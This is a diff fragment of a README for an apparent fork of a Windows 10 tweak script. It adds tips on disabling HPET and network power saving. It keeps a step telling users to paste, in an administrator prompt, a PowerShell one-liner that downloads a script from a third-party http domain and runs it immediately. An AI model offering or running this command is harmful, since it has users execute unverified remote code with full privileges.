ChrisTitusTech/win10script/README.md

 - Clearing Temp folders.

 # How To Use!
+Please First Disable High Precision Event Timer Device under system Device In Device Manager if Found!
+Disable Any Power saving feature under your network Devices. ex: Lan card, Wifi Card etc! also under Network Power Management Untick all marks!
+Click OK and you are good to go!
 Simply Run cmd (Command Prompt) as Administrator and paste the following!
 ```
 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://tweaks.daddymadu.gg')"